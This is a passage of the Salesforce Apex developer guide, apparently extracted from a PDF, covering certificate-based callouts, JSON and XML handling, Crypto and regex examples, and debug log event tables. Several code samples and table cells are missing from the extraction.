3. The generated Apex classes include a stub for calling the third-party Web service represented by the WSDL document. Edit the Apex
classes, and assign a value to a clientCertName_x variable on an instance of the stub class. The value must match the Unique
Name of the certificate you generated under Setup, in Security Controls > Certificate and Key Management.
The following example illustrates the last step of the previous procedure and works with the sample WSDL file in Understanding the
Generated Code. This example assumes that you previously generated a certificate with a Unique Name of DocSampleCert.
docSample.DocSamplePort stub = new docSample.DocSamplePort();
stub.clientCertName_x = 'DocSampleCert';
String input = 'This is the input string';
String output = stub.EchoString(input);
There is a legacy process for using a certificate obtained from a third party for your organization. Encode your client certificate key in
base64, and assign it to the clientCert_x variable on the stub. This is inherently less secure than using a Salesforce certificate
because it does not follow security best practices for protecting private keys. When you use a Salesforce certificate, the private key is not
shared outside Salesforce.
Note: Do not use a client certificate generated under Setup, in Develop > API > Generate Client Certificate. You must use a
certificate obtained from a third party for your organization if you use the legacy process.
The following example illustrates the legacy process and works with the sample WSDL file in Understanding the Generated Code on
page 338.
docSample.DocSamplePort stub = new docSample.DocSamplePort();
stub.clientCert_x =
'MIIGlgIBAzCCBlAGCSqGSIb3DQEHAaCCBkEEggY9MIIGOTCCAe4GCSqGSIb3DQEHAaCCAd8EggHb'+
'MIIB1zCCAdMGCyqGSIb3DQEMCgECoIIBgjCCAX4wKAYKKoZIhvcNAQwBAzAaBBSaUMlXnxjzpfdu'+
'6YFwZgJFMklDWFyvCnQeuZpN2E+Rb4rf9MkJ6FsmPDA9MCEwCQYFKw4DAhoFAAQU4ZKBfaXcN45w'+
'9hYm215CcA4n4d0EFJL8jr68wwKwFsVckbjyBz/zYHO6AgIEAA==';
// Password for the keystore
stub.clientCertPasswd_x = 'passwd';
String input = 'This is the input string';
String output = stub.EchoString(input);
356
JSON Support
JavaScript Object Notation (JSON) support in Apex enables the serialization of Apex objects into JSON format and the deserialization of
serialized JSON content.
Apex provides a set of classes that expose methods for JSON serialization and deserialization. The following table describes the classes
available.
Class
Description
System.JSON
System.JSONGenerator
System.JSONParser
357
The System.JSONToken enumeration contains the tokens used for JSON parsing.
Methods in these classes throw a JSONException if an issue is encountered during execution.
JSON Support Considerations
JSON serialization and deserialization support is available for sObjects (standard objects and custom objects), Apex primitive
and collection types, return types of Database methods (such as SaveResult, DeleteResult, and so on), and instances of your Apex
classes.
Only custom objects, which are sObject types, of managed packages can be serialized from code that is external to the
managed package. Objects that are instances of Apex classes defined in the managed package can't be serialized.
Deserialized Map objects whose keys are not strings won't match their corresponding Map objects before serialization. Key
values are converted into strings during serialization and will, when deserialized, change their type. For example, a Map<Object,
sObject> will become a Map<String, sObject>.
When an object is declared as the parent type but is set to an instance of the subtype, some data may be lost. The object gets
serialized and deserialized as the parent type and any fields that are specific to the subtype are lost.
An object that has a reference to itself wont get serialized and causes a JSONException to be thrown.
Reference graphs that reference the same object twice are deserialized and cause multiple copies of the referenced object to
be generated.
The System.JSONParser data type isnt serializable. If you have a serializable class, such as a Visualforce controller, that
has a member variable of type System.JSONParser and you attempt to create this object, youll receive an exception. To
use JSONParser in a serializable class, use a local variable instead in your method.
IN THIS SECTION:
Roundtrip Serialization and Deserialization
Using the JSON class methods, you can perform roundtrip serialization and deserialization of your JSON content.
JSON Generator
Using the JSONGenerator class methods, you can generate standard JSON-encoded content.
JSON Parsing
Using the JSONParser class methods, you can parse JSON-encoded content.
358
359
JSON Generator
This example adds a field to a contact after it has been queried, and then serializes the contact. The assertion statement verifies that
the JSON string contains the additional field. This assertion passes for Apex saved using Salesforce API version 28.0 and later.
Contact con = [SELECT Id, LastName, AccountId FROM Contact LIMIT 1];
// Set additional field
con.FirstName = 'Joe';
String jsonstring = Json.serialize(con);
System.debug(jsonstring);
System.assert(jsonstring.contains('Joe') == true);
SEE ALSO:
JSON Class
JSON Generator
Using the JSONGenerator class methods, you can generate standard JSON-encoded content.
You can construct JSON content, element by element, using the standard JSON encoding. To do so, use the methods in the
JSONGenerator class.
JSONGenerator Sample
This example generates a JSON string in pretty print format by using the methods of the JSONGenerator class. The example first
adds a number field and a string field, and then adds a field to contain an object field of a list of integers, which gets deserialized properly.
Next, it adds the A object into the Object A field, which also gets deserialized.
public class JSONGeneratorSample{
public class A {
String str;
public A(String s) { str = s; }
}
static void generateJSONContent() {
// Create a JSONGenerator object.
// Pass true to the constructor for pretty print formatting.
JSONGenerator gen = JSON.createGenerator(true);
360
JSON Parsing
SEE ALSO:
JSONGenerator Class
JSON Parsing
Using the JSONParser class methods, you can parse JSON-encoded content.
Use the JSONParser methods to parse a response that's returned from a call to an external service that is in JSON format, such as a
JSON-encoded response of a Web service callout. The following are samples that show how to parse JSON strings.
361
JSON Parsing
362
JSON Parsing
363
XML Support
SEE ALSO:
JSONParser Class
XML Support
Apex provides utility classes that enable the creation and parsing of XML content using streams and the DOM.
This section contains details about XML support.
IN THIS SECTION:
Reading and Writing XML Using Streams
Apex provides classes for reading and writing XML content using streams.
Reading and Writing XML Using the DOM
Apex provides classes that enable you to work with XML content using the DOM (Document Object Model).
364
Those methods are used in conjunction with HTTP callouts to parse XML data or skip unwanted events. The following example shows
how to instantiate a new XmlStreamReader object:
String xmlString = '<books><book>My Book</book><book>Your Book</book></books>';
XmlStreamReader xsr = new XmlStreamReader(xmlString);
XmlStreamReader Example
The following example processes an XML string.
public class XmlStreamReaderDemo {
// Create a class Book for processing
public class Book {
String name;
String author;
}
public Book[] parseBooks(XmlStreamReader reader) {
Book[] books = new Book[0];
boolean isSafeToGetNextXmlElement = true;
while(isSafeToGetNextXmlElement) {
// Start at the beginning of the book and make sure that it is a book
if (reader.getEventType() == XmlTag.START_ELEMENT) {
if ('Book' == reader.getLocalName()) {
// Pass the book to the parseBook method (below)
Book book = parseBook(reader);
books.add(book);
}
}
// Always use hasNext() before calling next() to confirm
// that we have not reached the end of the stream
if (reader.hasNext()) {
reader.next();
} else {
365
isSafeToGetNextXmlElement = false;
break;
}
}
return books;
}
// Parse through the XML, determine the author and the characters
Book parseBook(XmlStreamReader reader) {
Book book = new Book();
book.author = reader.getAttributeValue(null, 'author');
boolean isSafeToGetNextXmlElement = true;
while(isSafeToGetNextXmlElement) {
if (reader.getEventType() == XmlTag.END_ELEMENT) {
break;
} else if (reader.getEventType() == XmlTag.CHARACTERS) {
book.name = reader.getText();
}
// Always use hasNext() before calling next() to confirm
// that we have not reached the end of the stream
if (reader.hasNext()) {
reader.next();
} else {
isSafeToGetNextXmlElement = false;
break;
}
}
return book;
}
}
@isTest
private class XmlStreamReaderDemoTest {
// Test that the XML string contains specific values
static testMethod void testBookParser() {
XmlStreamReaderDemo demo = new XmlStreamReaderDemo();
String str = '<books><book author="Chatty">Foo bar</book>' +
'<book author="Sassy">Baz</book></books>';
XmlStreamReader reader = new XmlStreamReader(str);
XmlStreamReaderDemo.Book[] books = demo.parseBooks(reader);
System.debug(books.size());
for (XmlStreamReaderDemo.Book book : books) {
System.debug(book);
}
366
}
}
SEE ALSO:
XmlStreamReader Class
367
SEE ALSO:
XmlStreamWriter Class
XML Namespaces
An XML namespace is a collection of names identified by a URI reference and used in XML documents to uniquely identify element types
and attribute names. Names in XML namespaces may appear as qualified names, which contain a single colon, separating the name
into a namespace prefix and a local part. The prefix, which is mapped to a URI reference, selects a namespace. The combination of the
universally managed URI namespace and the document's own namespace produces identifiers that are universally unique.
The following XML element has a namespace of http://my.name.space and a prefix of myprefix.
<sampleElement xmlns:myprefix="http://my.name.space" />
368
Document Example
For the purposes of the sample below, assume that the url argument passed into the parseResponseDom method returns this
XML response:
<address>
<name>Kirk Stevens</name>
<street1>808 State St</street1>
<street2>Apt. 2</street2>
<city>Palookaville</city>
<state>PA</state>
<country>USA</country>
</address>
The following example illustrates how to use DOM classes to parse the XML response returned in the body of a GET request:
public class DomDocument {
// Pass in the URL for the request
// For the purposes of this sample,assume that the URL
// returns the XML shown above in the response body
public void parseResponseDom(String url){
Http h = new Http();
HttpRequest req = new HttpRequest();
// url that returns the XML in the response body
req.setEndpoint(url);
req.setMethod('GET');
HttpResponse res = h.send(req);
Dom.Document doc = res.getBodyDocument();
//Retrieve the root element for this document.
Dom.XMLNode address = doc.getRootElement();
String name = address.getChildElement('name', null).getText();
String state = address.getChildElement('state', null).getText();
// print out specific elements
System.debug('Name: ' + name);
System.debug('State: ' + state);
// Alternatively, loop through the child elements.
// This prints out all the elements of the address
for(Dom.XMLNode child : address.getChildElements()) {
System.debug(child.getText());
}
}
}
369
ELEMENT
TEXT
It is important to distinguish between elements and nodes in an XML document. The following is a simple XML example:
<name>
<firstName>Suvain</firstName>
<lastName>Singh</lastName>
</name>
This example contains three XML elements: name, firstName, and lastName. It contains five nodes: the three name, firstName,
and lastName element nodes, as well as two text nodesSuvain and Singh. Note that the text within an element node is
considered to be a separate text node.
For more information about the methods shared by all enums, see Enum Methods.
XmlNode Example
This example shows how to use XmlNode methods and namespaces to create an XML request.
public class DomNamespaceSample
{
public void sendRequest(String endpoint)
{
// Create the request envelope
DOM.Document doc = new DOM.Document();
String soapNS = 'http://schemas.xmlsoap.org/soap/envelope/';
String xsi = 'http://www.w3.org/2001/XMLSchema-instance';
String serviceNS = 'http://www.myservice.com/services/MyService/';
dom.XmlNode envelope
= doc.createRootElement('Envelope', soapNS, 'soapenv');
envelope.setNamespace('xsi', xsi);
envelope.setAttributeNS('schemaLocation', soapNS, xsi, null);
dom.XmlNode body
= envelope.addChildElement('Body', soapNS, null);
body.addChildElement('echo', serviceNS, 'req').
addChildElement('category', serviceNS, null).
addTextNode('classifieds');
System.debug(doc.toXmlString());
// Send the request
HttpRequest req = new HttpRequest();
req.setMethod('POST');
req.setEndpoint(endpoint);
req.setHeader('Content-Type', 'text/xml');
req.setBodyDocument(doc);
Http http = new Http();
HttpResponse res = http.send(req);
370
System.assertEquals(200, res.getStatusCode());
dom.Document resDoc = res.getBodyDocument();
envelope = resDoc.getRootElement();
String wsa = 'http://schemas.xmlsoap.org/ws/2004/08/addressing';
dom.XmlNode header = envelope.getChildElement('Header', soapNS);
System.assert(header != null);
String messageId
= header.getChildElement('MessageID', wsa).getText();
System.debug(messageId);
System.debug(resDoc.toXmlString());
System.debug(resDoc);
System.debug(header);
System.assertEquals(
'http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous',
header.getChildElement(
'ReplyTo', wsa).getChildElement('Address', wsa).getText());
System.assertEquals(
envelope.getChildElement('Body', soapNS).
getChildElement('echo', serviceNS).
getChildElement('something', 'http://something.else').
getChildElement(
'whatever', serviceNS).getAttribute('bb', null),
'cc');
System.assertEquals('classifieds',
envelope.getChildElement('Body', soapNS).
getChildElement('echo', serviceNS).
getChildElement('category', serviceNS).getText());
}
}
371
urlToTest = 'amazon.com';
version = '2005-07-11';
endpoint = 'http://awis.amazonaws.com/';
accessKey = 'your_key';
372
The following is an example of writing a unit test for the encryptWithManagedIV and decryptWithManagedIV Crypto
methods.
@isTest
private class CryptoTest {
static testMethod void testValidDecryption() {
// Use generateAesKey to generate the private key
Blob key = Crypto.generateAesKey(128);
// Generate the data to be encrypted.
Blob data = Blob.valueOf('Test data');
// Generate an encrypted form of the data using base64 encoding
String b64Data = EncodingUtil.base64Encode(data);
// Encrypt and decrypt the data
Blob encryptedData = Crypto.encryptWithManagedIV('AES128', key, data);
Blob decryptedData = Crypto.decryptWithManagedIV('AES128', key, encryptedData);
String b64Decrypted = EncodingUtil.base64Encode(decryptedData);
// Verify that the strings still match
System.assertEquals(b64Data, b64Decrypted);
}
static testMethod void testInvalidDecryption() {
// Verify that you must use the same key size for encrypting data
// Generate two private keys, using different key sizes
Blob keyOne = Crypto.generateAesKey(128);
Blob keyTwo = Crypto.generateAesKey(256);
// Generate the data to be encrypted.
Blob data = Blob.valueOf('Test data');
// Encrypt the data using the first key
Blob encryptedData = Crypto.encryptWithManagedIV('AES128', keyOne, data);
try {
// Try decrypting the data using the second key
Crypto.decryptWithManagedIV('AES256', keyTwo, encryptedData);
System.assert(false);
} catch(SecurityException e) {
System.assertEquals('Given final block not properly padded', e.getMessage());
}
373
}
}
SEE ALSO:
Crypto Class
EncodingUtil Class
This next example shows how to use convertToHex to compute a client response for HTTP Digest Authentication (RFC2617).
@isTest
private class SampleTest {
static testmethod void testConvertToHex() {
String myData = 'A Test String';
Blob hash = Crypto.generateDigest('SHA1',Blob.valueOf(myData));
String hexDigest = EncodingUtil.convertToHex(hash);
System.debug(hexDigest);
}
}
SEE ALSO:
EncodingUtil Class
374
Note: In Apex, Patterns and Matchers, as well as regular expressions, are based on their counterparts in Java. See
http://java.sun.com/j2se/1.5.0/docs/api/index.html?java/util/regex/Pattern.html.
Many Matcher objects can share the same Pattern object, as shown in the following illustration:
Many Matcher objects can be created from the same Pattern object
Regular expressions in Apex follow the standard syntax for regular expressions used in Java. Any Java-based regular expression strings
can be easily imported into your Apex code.
Note: Salesforce limits the number of times an input sequence for a regular expression can be accessed to 1,000,000 times. If you
reach that limit, you receive a runtime error.
All regular expressions are specified as strings. Most regular expressions are first compiled into a Pattern object: only the String split
method takes a regular expression that isn't compiled.
Generally, after you compile a regular expression into a Pattern object, you only use the Pattern object once to create a Matcher object.
All further actions are then performed using the Matcher object. For example:
// First, instantiate a new Pattern object "MyPattern"
Pattern MyPattern = Pattern.compile('a*b');
// Then instantiate a new Matcher object "MyMatcher"
Matcher MyMatcher = MyPattern.matcher('aaaaab');
// You can use the system static method assert to verify the match
System.assert(MyMatcher.matches());
If you are only going to use a regular expression once, use the Pattern class matches method to compile the expression and
match a string against it in a single invocation. For example, the following is equivalent to the code above:
Boolean Test = Pattern.matches('a*b', 'aaaaab');
IN THIS SECTION:
Using Regions
Using Match Operations
Using Bounds
375
Using Regions
Using Regions
A Matcher object finds matches in a subset of its input string called a region. The default region for a Matcher object is always the entirety
of the input string. However, you can change the start and end points of a region by using the region method, and you can query
the region's end points by using the regionStart and regionEnd methods.
The region method requires both a start and an end value. The following table provides examples of how to set one value without
setting the other.
Start of the Region
Specify explicitly
Leave unchanged
Leave unchanged
Specify explicitly
Specify explicitly
Code Example
MyMatcher.region(start, MyMatcher.regionEnd());
MyMatcher.region(MyMatcher.regionStart(), end);
MyMatcher.region(0, end);
Using Bounds
By default, a region is delimited by anchoring bounds, which means that the line anchors (such as ^ or $) match at the region boundaries,
even if the region boundaries have been moved from the start and end of the input string. You can specify whether a region uses
anchoring bounds with the useAnchoringBounds method. By default, a region always uses anchoring bounds. If you set
useAnchoringBounds to false, the line anchors match only the true ends of the input string.
376
By default, all text located outside of a region is not searched, that is, the region has opaque bounds. However, using transparent bounds
it is possible to search the text outside of a region. Transparent bounds are only used when a region no longer contains the entire input
string. You can specify which type of bounds a region has by using the useTransparentBounds method.
Suppose you were searching the following string, and your region was only the word STRING:
This is a concatenated STRING of cats and dogs.
If you searched for the word cat, you wouldn't receive a match unless you had transparent bounds set.
377
System.assert(myMatcher.end() == myMatcher.end(0));
// Since the offset after the last character matched is returned by end,
// and since both groups used the last input letter, that offset is 3
// Remember the offset starts its count at 0. So the following is also true:
System.assert(myMatcher.end() == 3 &&
myMatcher.end(0) == 3 &&
myMatcher.end(1) == 3);
In the following example, email addresses are normalized and duplicates are reported if there is a different top-level domain name or
subdomain for similar email addresses. For example, [email protected] is normalized to john@smithco.
class normalizeEmailAddresses{
public void hasDuplicatesByDomain(Lead[] leads) {
// This pattern reduces the email address to 'john@smithco'
// from 'john@*.smithco.com' or 'john@smithco.*'
Pattern emailPattern = Pattern.compile('(?<=@)((?![\\w]+\\.[\\w]+$)
[\\w]+\\.)|(\\.[\\w]+$)');
// Define a set for emailkey to lead:
Map<String,Lead> leadMap = new Map<String,Lead>();
for(Lead lead:leads) {
// Ignore leads with a null email
if(lead.Email != null) {
// Generate the key using the regular expression
String emailKey = emailPattern.matcher(lead.Email).replaceAll('');
// Look for duplicates in the batch
if(leadMap.containsKey(emailKey))
lead.email.addError('Duplicate found in batch');
else {
// Keep the key in the duplicate key custom field
lead.Duplicate_Key__c = emailKey;
leadMap.put(emailKey, lead);
}
}
}
// Now search the database looking for duplicates
for(Lead[] leadsCheck:[SELECT Id, duplicate_key__c FROM Lead WHERE
duplicate_key__c IN :leadMap.keySet()]) {
for(Lead lead:leadsCheck) {
// If there's a duplicate, add the error.
if(leadMap.containsKey(lead.Duplicate_Key__c))
leadMap.get(lead.Duplicate_Key__c).email.addError('Duplicate found
in salesforce(Id: ' + lead.Id + ')');
}
}
378
}
}
SEE ALSO:
Pattern Class
Matcher Class
379
FINISHING TOUCHES
Understanding the
Debug Log
Exceptions in Apex
Apex provides debugging support. You can debug your Apex code using the Developer Console and
debug logs. To aid debugging in your code, Apex supports exception statements and custom exceptions.
Also, Apex sends emails to developers for unhandled exceptions.
380
Debugging Apex
In this example, the API version is 25.0, and the following debug log categories and levels have been set:
Apex Code
DEBUG
381
Debugging Apex
Apex Profiling
INFO
Callout
INFO
Database
INFO
System
DEBUG
Validation
INFO
Visualforce
INFO
Workflow
INFO
Execution Units
An execution unit is equivalent to a transaction. It contains everything that occurred within the transaction. The execution is delimited
by EXECUTION_STARTED and EXECUTION_FINISHED.
Code Units
A code unit is a discrete unit of work within a transaction. For example, a trigger is one unit of code, as is a webService method,
or a validation rule.
Note: A class is not a discrete unit of code.
Units of code are indicated by CODE_UNIT_STARTED and CODE_UNIT_FINISHED. Units of work can embed other units
of work. For example:
EXECUTION_STARTED
CODE_UNIT_STARTED|[EXTERNAL]execute_anonymous_apex
CODE_UNIT_STARTED|[EXTERNAL]MyTrigger on Account trigger event BeforeInsert for [new]
CODE_UNIT_FINISHED <-- The trigger ends
CODE_UNIT_FINISHED <-- The executeAnonymous ends
EXECUTION_FINISHED
Units of code include, but are not limited to, the following:
Triggers
Workflow invocations and time-based workflow
Validation rules
Approval processes
Apex lead convert
@future method invocations
Web service invocations
executeAnonymous calls
Visualforce property accesses on Apex controllers
Visualforce actions on Apex controllers
Execution of the batch Apex start and finish methods, as well as each execution of the execute method
Execution of the Apex System.Schedule execute method
Incoming email handling
382
Debugging Apex
Log Lines
Log lines are Included inside units of code and indicate what code or rules are being executed. Log lines can also be messages
specifically written to the debug log. For example:
Log lines are made up of a set of fields, delimited by a pipe (|). The format is:
timestamp: consists of the time when the event occurred and a value between parentheses. The time is in the user's time zone
and in the format HH:mm:ss.SSS. The value represents the time elapsed in milliseconds since the start of the request. The
elapsed time value is excluded from logs reviewed in the Developer Console.
event identifier: consists of the specific event that triggered the debug log being written to, such as SAVEPOINT_RESET or
VALIDATION_RULE, and any additional information logged with that event, such as the method name or the line and
character number where the code was executed.
Additional Log Data
In addition, the log contains the following information:
Cumulative resource usage is logged at the end of many code units, such as triggers, executeAnonymous, batch Apex
message processing, @future methods, Apex test methods, Apex web service methods, and Apex lead convert.
Cumulative profiling information is logged once at the end of the transaction and contains information about the most expensive
queries (used the most resources), DML invocations, and so on.
The following is an example debug log:
22.0
APEX_CODE,DEBUG;APEX_PROFILING,INFO;CALLOUT,INFO;DB,INFO;SYSTEM,DEBUG;VALIDATION,INFO;VISUALFORCE,INFO;
WORKFLOW,INFO
11:47:46.030 (30064000)|EXECUTION_STARTED
11:47:46.030 (30159000)|CODE_UNIT_STARTED|[EXTERNAL]|TRIGGERS
11:47:46.030 (30271000)|CODE_UNIT_STARTED|[EXTERNAL]|01qD00000004JvP|myAccountTrigger on
Account trigger event BeforeUpdate for [001D000000IzMaE]
11:47:46.038 (38296000)|SYSTEM_METHOD_ENTRY|[2]|System.debug(ANY)
11:47:46.038 (38450000)|USER_DEBUG|[2]|DEBUG|Hello World!
11:47:46.038 (38520000)|SYSTEM_METHOD_EXIT|[2]|System.debug(ANY)
11:47:46.546 (38587000)|CUMULATIVE_LIMIT_USAGE
11:47:46.546|LIMIT_USAGE_FOR_NS|(default)|
Number of SOQL queries: 0 out of 100
Number of query rows: 0 out of 50000
Number of SOSL queries: 0 out of 20
Number of DML statements: 0 out of 150
Number of DML rows: 0 out of 10000
Number of code statements: 1 out of 200000
Maximum heap size: 0 out of 6000000
Number of callouts: 0 out of 10
Number of Email Invocations: 0 out of 10
Number of fields describes: 0 out of 100
383
Debugging Apex
Number
Number
Number
Number
of
of
of
of
11:47:46.546|CUMULATIVE_LIMIT_USAGE_END
11:47:46.038
BeforeUpdate
11:47:47.154
11:47:47.154
384
Debugging Apex
2. Class1 calls a method of Class3, which in turn calls a method of a utility class. For example:
public class Class1 {
public static void someMethod() {
Class3.thirdMethod();
}
}
public class Class3 {
public static void thirdMethod() {
UtilityClass.doSomething();
}
}
Logs open in Log Inspector. Log Inspector is a context-sensitive execution viewer that shows the source of an operation, what triggered
the operation, and what occurred afterward. Use this tool to inspect debug logs that include database events, Apex processing, workflow,
and validation logic.
To learn more about working with logs in the Developer Console, see Log Inspector in the Salesforce online help.
When using the Developer Console or monitoring a debug log, you can specify the level of information that gets included in the log.
385
Debugging Apex
Log category
The type of information logged, such as information from Apex or workflow rules.
Log level
The amount of information logged.
Event type
The combination of log category and log level that specify which events get logged. Each event can log additional information, such
as the line and character number where the event started, fields associated with the event, duration of the event in milliseconds,
and so on.
Description
Database
Includes information about database activity, including every data manipulation language
(DML) statement or inline SOQL or SOSL query.
Workflow
Includes information for workflow rules, such as the rule name, the actions taken, and so on.
Validation
Includes information about validation rules, such as the name of the rule, whether the rule
evaluated true or false, and so on.
Callout
Includes the request-response XML that the server is sending and receiving from an external
Web service. This is useful when debugging issues related to using Force.com Web services
API calls.
Apex Code
Includes information about Apex code and can include information such as log messages
generated by DML statements, inline SOQL or SOSL queries, the start and completion of any
triggers, and the start and completion of any test method, and so on.
Apex Profiling
Includes cumulative profiling information, such as the limits for your namespace, the number
of emails sent, and so on.
Visualforce
System
Includes information about calls to all system methods such as the System.debug
method.
386
Debugging Apex
DEBUG
FINE
FINER
FINEST
Important: Before running a deployment, verify that the Apex Code log level is not set to FINEST. Otherwise, the deployment
may take longer than expected. If the Developer Console is open, the log levels in the Developer Console affect all logs, including
logs created during a deployment.
387
Debugging Apex
The following log line is recorded when the test reaches line 5 in the code:
15:51:01.071 (55856000)|DML_BEGIN|[5]|Op:Insert|Type:Invoice_Statement__c|Rows:1
Object name:
Type:Invoice_Statement__c
The following table lists the event types that are logged, what fields or other information get logged with each event, as well as what
combination of log level and category cause an event to be logged.
Event Name
Category
Logged
Level
Logged
BULK_HEAP_ALLOCATE
Apex Code
FINEST
CALLOUT_REQUEST
Callout
INFO and
above
CALLOUT_RESPONSE
Callout
INFO and
above
CODE_UNIT_FINISHED
None
Apex Code
ERROR and
above
CODE_UNIT_STARTED
Apex Code
ERROR and
above
388
Debugging Apex
Event Name
Category
Logged
Level
Logged
CONSTRUCTOR_ENTRY
Apex Code
DEBUG and
above
CONSTRUCTOR_EXIT
Line number and the string <init>() with the Apex Code
types of parameters, if any, between the parentheses
DEBUG and
above
CUMULATIVE_LIMIT_USAGE
None
Apex
Profiling
INFO and
above
CUMULATIVE_LIMIT_USAGE_END
None
Apex
Profiling
INFO and
above
CUMULATIVE_PROFILING
None
Apex
Profiling
FINE and
above
CUMULATIVE_PROFILING_BEGIN
None
Apex
Profiling
FINE and
above
CUMULATIVE_PROFILING_END
None
Apex
Profiling
FINE and
above
DML_BEGIN
INFO and
above
DML_END
Line number
DB
INFO and
above
EMAIL_QUEUE
Line number
Apex Code
INFO and
above
ENTERING_MANAGED_PKG
Package namespace
Apex Code
INFO and
above
EXCEPTION_THROWN
Apex Code
INFO and
above
EXECUTION_FINISHED
None
Apex Code
ERROR and
above
EXECUTION_STARTED
None
Apex Code
ERROR and
above
FATAL_ERROR
Apex Code
ERROR and
above
FLOW_ACTIONCALL_DETAIL
FINER and
above
FLOW_ASSIGNMENT_DETAIL
FINER and
above
389
Workflow
Debugging Apex
Event Name
Category
Logged
Level
Logged
FLOW_BULK_ELEMENT_BEGIN
Workflow
FINE and
above
FLOW_BULK_ELEMENT_DETAIL
FINER and
above
FLOW_BULK_ELEMENT_END
Workflow
FINE and
above
FLOW_CREATE_INTERVIEW_BEGIN
Workflow
INFO and
above
FLOW_CREATE_INTERVIEW_END
Workflow
INFO and
above
FLOW_CREATE_INTERVIEW_ERROR
Workflow
ERROR and
above
FLOW_ELEMENT_BEGIN
Workflow
FINE and
above
FLOW_ELEMENT_END
Workflow
FINE and
above
FLOW_ELEMENT_ERROR
Workflow
ERROR and
above
FLOW_ELEMENT_ERROR
Workflow
ERROR and
above
FLOW_ELEMENT_ERROR
ERROR and
above
FLOW_ELEMENT_ERROR
ERROR and
above
FLOW_ELEMENT_ERROR
ERROR and
above
FLOW_ELEMENT_FAULT
WARNING
and above
FLOW_ELEMENT_FAULT
FINER and
above
FLOW_LOOP_DETAIL
FLOW_RULE_DETAIL
390
Workflow
FINER and
above
Debugging Apex
Event Name
Category
Logged
Level
Logged
FLOW_START_INTERVIEW_BEGIN
Workflow
INFO and
above
FLOW_START_INTERVIEW_END
Workflow
INFO and
above
FLOW_START_INTERVIEWS_BEGIN
Requests
Workflow
INFO and
above
FLOW_START_INTERVIEWS_END
Requests
Workflow
INFO and
above
FLOW_START_INTERVIEWS_ERROR
Workflow
ERROR and
above
FLOW_SUBFLOW_DETAIL
Workflow
FINER and
above
FLOW_VALUE_ASSIGNMENT
Workflow
FINER and
above
FLOW_WAIT_EVENT_RESUMING_DETAIL Interview ID, element name, event name, and event Workflow
type
FINER and
above
FLOW_WAIT_EVENT_WAITING_DETAIL
FINER and
above
FLOW_WAIT_RESUMING_DETAIL
FINER and
above
FLOW_WAIT_WAITING_DETAIL
FINER and
above
HEAP_ALLOCATE
Apex Code
FINER and
above
HEAP_DEALLOCATE
Apex Code
FINER and
above
IDEAS_QUERY_EXECUTE
Line number
DB
FINEST
LIMIT_USAGE_FOR_NS
Apex
Profiling
FINEST
391
Debugging Apex
Event Name
Category
Logged
Level
Logged
METHOD_ENTRY
Apex Code
DEBUG and
above
METHOD_EXIT
Apex Code
DEBUG and
above
INFO and
above
PUSH_NOTIFICATION_INVALID_APP
Apex Code
ERROR
Apex Code
ERROR
392
Debugging Apex
Event Name
Category
Logged
Level
Logged
Apex Code
ERROR
Apex Code
DEBUG
PUSH_NOTIFICATION_NOT_ENABLED
Apex Code
INFO
PUSH_NOTIFICATION_SENT
Apex Code
DEBUG
INFO and
above
QUERY_MORE_BEGIN
Line number
DB
INFO and
above
QUERY_MORE_END
Line number
DB
INFO and
above
QUERY_MORE_ITERATIONS
DB
INFO and
above
SAVEPOINT_ROLLBACK
DB
INFO and
above
SAVEPOINT_SET
DB
INFO and
above
SLA_END
INFO and
above
SLA_EVAL_MILESTONE
Milestone ID
Workflow
INFO and
above
SLA_NULL_START_DATE
None
Workflow
INFO and
above
393
Debugging Apex
Event Name
Category
Logged
Level
Logged
SLA_PROCESS_CASE
Case ID
Workflow
INFO and
above
SOQL_EXECUTE_BEGIN
DB
INFO and
above
SOQL_EXECUTE_END
DB
INFO and
above
SOSL_EXECUTE_BEGIN
DB
INFO and
above
SOSL_EXECUTE_END
DB
INFO and
above
STACK_FRAME_VARIABLE_LIST
Apex
Profiling
FINE and
above
var1:50
var2:'Hello World'
STATEMENT_EXECUTE
Line number
Apex Code
FINER and
above
STATIC_VARIABLE_LIST
Apex
Profiling
FINE and
above
var1:50
var2:'Hello World'
SYSTEM_CONSTRUCTOR_ENTRY
DEBUG and
above
SYSTEM_CONSTRUCTOR_EXIT
DEBUG and
above
SYSTEM_METHOD_ENTRY
System
DEBUG and
above
SYSTEM_METHOD_EXIT
System
DEBUG and
above
SYSTEM_MODE_ENTER
Mode name
System
INFO and
above
SYSTEM_MODE_EXIT
Mode name
System
INFO and
above
TESTING_LIMITS
None
Apex
Profiling
INFO and
above
394
Debugging Apex
Event Name
Category
Logged
Level
Logged
TOTAL_EMAIL_RECIPIENTS_QUEUED
Apex
Profiling
FINE and
above
USER_DEBUG
DEBUG and
above by
default. If the
user sets the
log level for
the
System.Debug
method, the
event is
logged at
that level
instead.
VALIDATION_ERROR
Error message
Validation
INFO and
above
VALIDATION_FAIL
None
Validation
INFO and
above
VALIDATION_FORMULA
Validation
INFO and
above
VALIDATION_PASS
None
Validation
INFO and
above
VALIDATION_RULE
Rule name
Validation
INFO and
above
VARIABLE_ASSIGNMENT
FINEST
VARIABLE_SCOPE_BEGIN
FINEST
VARIABLE_SCOPE_END
None
Apex Code
FINEST
VF_APEX_CALL
Apex Code
INFO and
above
VF_DESERIALIZE_VIEWSTATE_BEGIN
View state ID
Visualforce
INFO and
above
VF_DESERIALIZE_VIEWSTATE_END
None
Visualforce
INFO and
above
VF_EVALUATE_FORMULA_BEGIN
Visualforce
FINER and
above
395
Debugging Apex
Event Name
Category
Logged
Level
Logged
VF_EVALUATE_FORMULA_END
None
Visualforce
FINER and
above
VF_PAGE_MESSAGE
Message text
Apex Code
INFO and
above
VF_SERIALIZE_VIEWSTATE_BEGIN
View state ID
Visualforce
INFO and
above
VF_SERIALIZE_VIEWSTATE_END
None
Visualforce
INFO and
above
WF_ACTION
Action description
Workflow
INFO and
above
WF_ACTION_TASK
Workflow
INFO and
above
WF_ACTIONS_END
Workflow
INFO and
above
WF_APPROVAL
Workflow
INFO and
above
WF_APPROVAL_REMOVE
EntityName: NameField Id
Workflow
INFO and
above
WF_APPROVAL_SUBMIT
EntityName: NameField Id
Workflow
INFO and
above
WF_ASSIGN
Workflow
INFO and
above
WF_CRITERIA_BEGIN
INFO and
above
Workflow
INFO and
above
WF_EMAIL_ALERT
Workflow
INFO and
above
WF_EMAIL_SENT
Workflow
INFO and
above
WF_ENQUEUE_ACTIONS
Workflow
INFO and
